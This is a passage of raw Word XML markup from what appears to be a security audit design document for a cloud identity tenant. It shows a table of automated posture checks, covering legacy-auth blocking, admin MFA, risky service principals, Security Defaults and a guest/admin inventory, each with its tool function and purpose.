            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EEE5C69" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Consent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="195C2115" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Admin consent granted, tenant-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7C19D3B5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57B89019" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Auth flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E7CFD9A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Client credentials (app-only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05DBD3FF" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D60A03F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc243301428"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Automated Audit Checks (Stage 3)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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500"/>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="3100"/>
        <w:gridCol w:w="3300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="59BA63F4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EF07D15" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB738F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B8D0220" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tool Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B9762E9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="25B991F9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E996347" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D827A41" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Legacy authentication blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5198D2D3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>check_legacy_auth_blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EDCBFDE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirms an enabled CA policy blocks legacy clients tenant-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="03A8F884" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B21CDB4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ADD60D6" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Admin MFA enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59D8C18A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>check_admin_mfa_policy / get_admins_without_mfa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B85B621" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Flags admins without MFA registered or covered by CA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="037B0F40" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0452A26B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="712D9AC4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Risky service principals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D973E5F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_risky_service_principals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E40B561" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Flags own-tenant SPs holding high-risk Graph app permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7F666387" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2304C8E4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="099BA6FA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Security Defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3361779F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_security_defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D36EE72" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Avoids false positives when CA is absent but Security Defaults is active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="56CDBB89" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16052343" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E26867F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Guest / inventory baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0702A915" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>get_guests, get_global_admins, get_service_principals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C1D302C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
